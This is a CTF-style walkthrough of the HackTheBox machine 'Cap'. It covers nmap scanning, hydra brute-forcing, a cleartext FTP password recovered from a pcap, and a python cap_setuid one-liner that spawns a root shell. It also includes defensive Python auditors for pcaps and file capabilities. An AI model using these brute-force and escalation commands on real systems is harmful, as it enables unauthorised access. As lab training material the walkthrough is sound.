CAP 10.10.10.245

Background

CAP is a Linux-based machine from HackTheBox that requires patience with web searching and privilege escalation skills of the SUID kind.

A statistics website that saved users' network access records was deployed. One of the records contained an FTP transaction history that stored the login ID and password in cleartext. This credential can be used to access the target machine over the SSH protocol.

After gaining initial access, LinPEAS was used to search for possible privilege escalation paths. In the end, the Linux "capabilities" set on the python binary turned out to be the route to root access.

https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/

130n@calvinlai.com

Target Machine: 10.10.10.245

Attacker Machine: 10.10.14.3

Hacking Process Part 0 – Service Scanning

Nmap

1) nmap -p- -T5 --min-rate=1000 10.10.10.245 -oG fkclai.nmap

2) nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.245 -o nmap-result.txt

# Nmap 7.80 scan initiated Thu Sep  2 22:52:29 2021 as: nmap -p 21,22,80, -sC -sV -o nmap-result.txt 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Thu, 02 Sep 2021 14:58:29 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 02 Sep 2021 14:58:21 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 02 Sep 2021 14:58:22 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, GET, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=9/2%Time=6130E536%P=x86_64-pc-linux-gnu%r(GetRe
SF:quest,2FE5,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20T
SF:hu,\x2002\x20Sep\x202021\x2014:58:21\x20GMT\r\nConnection:\x20close\r\n
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x201938
SF:6\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\">\n
SF:\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20
SF:<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x
SF:20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<meta\x
SF:20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"image/
SF:png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x20<l
SF:ink\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css\">\
SF:n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/font
SF:-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20h
SF:ref=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20rel=\
SF:"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20\x20
SF:<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.min\.c
SF:ss\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/cs
SF:s/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOptions
SF:,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Thu,\x20
SF:02\x20Sep\x202021\x2014:58:22\x20GMT\r\nConnection:\x20close\r\nContent
SF:-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20OPTIONS,\x20GET,\x20
SF:HEAD\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1\x20
SF:400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\x20\
SF:x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<body>\n
SF:\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Invalid
SF:\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;RTSP/
SF:1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,189,
SF:"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x20Th
SF:u,\x2002\x20Sep\x202021\x2014:58:29\x20GMT\r\nConnection:\x20close\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20232\r
SF:\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20F
SF:inal//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\
SF:n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20serv
SF:er\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20che
SF:ck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep  2 22:55:03 2021 -- 1 IP address (1 host up) scanned in 154.69 seconds
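The two-step scan above first sweeps all ports into a grepable file and then feeds the open ports back into a service scan. As an added example (not part of the original write-up), the following Python reads nmap's -oG format directly and builds the -p argument; unlike the grep/cut/tr pipeline it leaves no trailing comma, which is why the follow-up scan header reads "-p 21,22,80,". The -oG text embedded below is constructed to match the three open ports on 10.10.10.245 and is not the real fkclai.nmap file.

```python
"""Collect open ports from nmap grepable (-oG) output.

Added example, not from the write-up: it does in Python what the
grep/cut/tr pipeline does, but builds the -p argument without the trailing
comma.  SAMPLE_GNMAP is constructed to match the scan of 10.10.10.245.
"""
import re

# Constructed sample of "nmap -p- ... -oG fkclai.nmap" output (not the real file).
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Thu Sep  2 22:45:00 2021 as: nmap -p- -T5 --min-rate=1000 10.10.10.245 -oG fkclai.nmap
Host: 10.10.10.245 ()\tStatus: Up
Host: 10.10.10.245 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (65532)
# Nmap done at Thu Sep  2 22:47:10 2021 -- 1 IP address (1 host up) scanned in 130.00 seconds
"""

# One port entry in the Ports field: port/state/protocol/owner/service/rpc-info/version/
PORT_RE = re.compile(r"(\d{1,5})/(\w+)/(\w+)/[^/]*/([^/]*)/")


def parse_gnmap(text):
    """Return {host: [(port, proto, service), ...]} for ports whose state is 'open'."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the next tab-separated field (e.g. "Ignored State").
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for match in PORT_RE.finditer(ports_field):
            port, state, proto, service = match.groups()
            if state == "open":
                hosts.setdefault(host, []).append((int(port), proto, service))
    return hosts


def open_port_spec(text, host=None):
    """Comma-joined open ports for nmap -p, e.g. '21,22,80' (no trailing comma)."""
    hosts = parse_gnmap(text)
    if host is None:
        ports = {p for entries in hosts.values() for p, _, _ in entries}
    else:
        ports = {p for p, _, _ in hosts.get(host, [])}
    return ",".join(str(p) for p in sorted(ports))


if __name__ == "__main__":
    for host, entries in parse_gnmap(SAMPLE_GNMAP).items():
        for port, proto, service in entries:
            print(f"{host} {port}/{proto} {service}")
    print("nmap -p", open_port_spec(SAMPLE_GNMAP), "-sC -sV 10.10.10.245")
```

Only entries whose state is literally "open" are kept, so filtered or closed ports that nmap lists explicitly never leak into the second scan.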

Enumeration strategies

No vulnerability was found in the HTTP server or the SSH/FTP services according to the Nmap result, so we can only focus on the following two enumeration paths: 1) FTP/SSH, 2) Web enumeration.

Hacking Process Part 1 – Enumeration

FTP/SSH enumeration: nothing can be done other than a brute-force attack on the FTP and SSH ports. However, the result was negative.

ftp 21
hydra -l root -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.245

ssh 22
hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.10.245 -t 4 ssh

Web enumeration: 1) Searching for hidden subfolders

dirb http://10.10.10.245/ /usr/share/wordlists/dirb/common.txt -o dirb-245.result 

gobuster dir -u 'http://10.10.10.245/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-245.result 

The following subfolders were found, among them a list of subfolders under the data directory.

2) Searching the website

When visiting the website, a download link pointing to a pcap file was found. The first pcap file was downloaded from http://cap.htb/data/18; no useful information was found after reading it. Based on the result of the folder enumeration above, an FTP login credential was found.
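The pcap exposure above is worth checking for on the defending side as well: any capture that records an FTP control channel carries the login in the clear. As an added example (not the author's tooling), the Python below parses a classic pcap file down to the TCP payloads, reassembles each client-to-server stream to port 21, and reports the USER/PASS commands it carries with the password masked, so the finding can be handed to the account owner without re-exposing the secret. The capture it reads is constructed in code and is not the /data/NN pcap from the box; the user name and password in it are sample values.

```python
"""Audit a pcap for FTP logins sent in cleartext.

Added example, not the author's tooling: a minimal pcap/Ethernet/IPv4/TCP
reader that reassembles client->server FTP control streams (TCP port 21) and
reports USER/PASS seen in the clear, with the password masked.  The capture
built by build_sample_pcap() is constructed, not the pcap from the box.
"""
import struct

LINKTYPE_ETHERNET = 1
FTP_PORT = 21


def build_sample_pcap():
    """Construct a tiny capture containing one FTP login (constructed data)."""
    def packet(src, sport, dst, dport, payload):
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
        ip_len = 20 + len(tcp) + len(payload)
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, ip_len, 0, 0, 64, 6, 0,
                         bytes(int(o) for o in src.split(".")),
                         bytes(int(o) for o in dst.split(".")))
        frame = b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload   # Ethernet header, type IPv4
        return struct.pack("<IIII", 1630594700, 0, len(frame), len(frame)) + frame

    client, server = "192.0.2.10", "192.0.2.21"   # documentation-range sample addresses
    records = [
        packet(server, FTP_PORT, client, 40000, b"220 (vsFTPd 3.0.3)\r\n"),
        packet(client, 40000, server, FTP_PORT, b"USER nathan\r\n"),
        packet(server, FTP_PORT, client, 40000, b"331 Please specify the password.\r\n"),
        # The PASS line is split across two segments, so per-stream reassembly is needed.
        packet(client, 40000, server, FTP_PORT, b"PASS S3cret"),
        packet(client, 40000, server, FTP_PORT, b"Example\r\n"),
        packet(server, FTP_PORT, client, 40000, b"230 Login successful.\r\n"),
    ]
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    return header + b"".join(records)


def iter_tcp_payloads(pcap):
    """Yield (src_ip, sport, dst_ip, dport, payload) for every TCP packet in the capture."""
    magic = pcap[:4]
    if magic in (b"\xd4\xc3\xb2\xa1", b"\x4d\x3c\xb2\xa1"):      # little-endian (usec / nsec)
        endian = "<"
    elif magic in (b"\xa1\xb2\xc3\xd4", b"\xa1\xb2\x3c\x4d"):    # big-endian
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    if struct.unpack(endian + "I", pcap[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link-layer captures are handled")
    offset = 24
    while offset + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[offset:offset + 16])
        frame = pcap[offset + 16:offset + 16 + incl_len]
        offset += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                   # not IPv4
        ihl = (frame[14] & 0x0F) * 4
        total_len = struct.unpack("!H", frame[16:18])[0]
        if frame[23] != 6:
            continue                                   # not TCP
        src = ".".join(str(b) for b in frame[26:30])
        dst = ".".join(str(b) for b in frame[30:34])
        tcp = frame[14 + ihl:14 + total_len]
        if len(tcp) < 20:
            continue
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_offset = (tcp[12] >> 4) * 4
        yield src, sport, dst, dport, tcp[data_offset:]


def find_cleartext_ftp_logins(pcap):
    """Reassemble client->server streams to port 21 and report USER/PASS seen in the clear."""
    streams = {}
    for src, sport, dst, dport, payload in iter_tcp_payloads(pcap):
        if dport == FTP_PORT and payload:
            streams.setdefault((src, sport, dst), bytearray()).extend(payload)
    findings = []
    for (src, sport, dst), buf in streams.items():
        user = password = None
        for line in buf.decode("latin-1").split("\r\n"):
            command, _, argument = line.partition(" ")
            if command.upper() == "USER":
                user = argument
            elif command.upper() == "PASS":
                password = argument
        if user is not None or password is not None:
            findings.append({
                "client": f"{src}:{sport}",
                "server": dst,
                "user": user,
                "password_seen": password is not None,
                "password_masked": None if password is None else password[:2] + "*" * (len(password) - 2),
            })
    return findings


if __name__ == "__main__":
    for finding in find_cleartext_ftp_logins(build_sample_pcap()):
        print(finding)
```

The sample deliberately splits the PASS line over two TCP segments: scanning packets one at a time would miss it, which is why the audit buffers each stream before looking for commands. Real captures from the wire (pcapng, VLAN tags, IPv6) need a fuller parser such as scapy or tshark; the point here is only what to look for.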

Hacking Process Part 2 – Gaining Foothold

Using the credential found in the pcap file, it was possible to SSH into the target machine and read the user.txt file.

After getting initial access, the next step is to upload linpeas.sh and start the privilege escalation (PE) scan.

Hacking Process Part 3 – Privilege Escalation

Because of the machine name "CAP", a finding related to Linux capabilities was interesting to me. When a binary has the Linux CAP_SETUID capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

After reading several articles, the paper written by Raj Chandel provided a detailed explanation of how this capability can be used for privilege escalation with the following commands.

cp $(which python) .
sudo setcap cap_setuid+ep python

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
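The cheap defensive counterpart to this finding is a periodic audit of file capabilities. As an added example (not from the write-up and not from Raj Chandel's article), the Python below parses the output of "getcap -r /" in both libcap formats ("/path = cap_x+ep" and the newer "/path cap_x=ep"), flags binaries holding capabilities that are effectively root, and separately flags any capability at all on a scripting interpreter, since an interpreter runs whatever code it is handed. The getcap sample is constructed; its python3.8 entry mirrors the CAP_SETUID finding above, and the set of "root-equivalent" capabilities is an assumption drawn from the usual privilege-escalation references rather than an official list.

```python
"""Audit file capabilities for entries that can lead to privilege escalation.

Added example, not from the write-up: parses "getcap -r /" output (old and
new libcap formats) and flags root-equivalent capabilities and any capability
on a scripting interpreter.  SAMPLE_GETCAP is constructed.
"""
import os
import re
import shutil
import subprocess

# Assumption: capabilities that let a process become root or read/write anything;
# taken from common privilege-escalation references, not an exhaustive list.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap", "cap_sys_rawio",
}
INTERPRETER_PREFIXES = ("python", "perl", "ruby", "node", "php", "lua")

# Constructed sample of "getcap -r /" output, mixing the old and new formats.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
"""

# One clause of a capability set: comma-separated names, an operator, then e/i/p flags.
CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)([+=])([eip]*)$")


def parse_getcap_line(line):
    """Return (path, {capabilities that are effective or permitted}) or None.

    Handles both "/path = cap_a,cap_b+ep" (libcap < 2.41) and
    "/path cap_a,cap_b=ep" (libcap >= 2.41).
    """
    tokens = line.split()
    first = next((i for i, tok in enumerate(tokens) if CLAUSE_RE.match(tok)), None)
    if first is None:
        return None
    path = " ".join(tok for tok in tokens[:first] if tok != "=")
    caps = set()
    for clause in tokens[first:]:
        match = CLAUSE_RE.match(clause)
        # Only effective/permitted bits matter; inheritable alone grants nothing by itself.
        if match and set(match.group(3)) & {"e", "p"}:
            caps.update(match.group(1).split(","))
    return path, caps


def audit_getcap_output(text):
    """Return findings [{'path', 'caps', 'reasons', 'fix'}] for risky entries."""
    findings = []
    for line in text.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        reasons = []
        risky = sorted(caps & ROOT_EQUIVALENT)
        if risky:
            reasons.append("root-equivalent capability: " + ",".join(risky))
        if os.path.basename(path).startswith(INTERPRETER_PREFIXES):
            reasons.append("capability granted to a scripting interpreter")
        if reasons:
            findings.append({"path": path, "caps": sorted(caps), "reasons": reasons,
                             "fix": f"setcap -r {path}"})
    return findings


def collect_getcap_output():
    """Use the live system's getcap when available, else the constructed sample."""
    if shutil.which("getcap") is None:
        return SAMPLE_GETCAP
    result = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    for finding in audit_getcap_output(collect_getcap_output()):
        print(finding["path"], finding["caps"], "; ".join(finding["reasons"]), "->", finding["fix"])
```

The suggested fix, "setcap -r", removes the capability set from the file. Where a program genuinely needs a capability, grant it to a small purpose-built binary rather than to an interpreter, and keep the interpreter entry in this audit as a standing alarm.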

Conclusion

FTP is an insecure protocol that transfers data in plain text, and that is the critical point that helped to gain the foothold. In addition, the user nathan having been given the privilege to run the python3 program as root is another security loophole.

The system administrator should be aware of security loopholes when enabling system services and assigning such capabilities, which can affect the integrity of the kernel and lead to privilege escalation.

Reference

https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
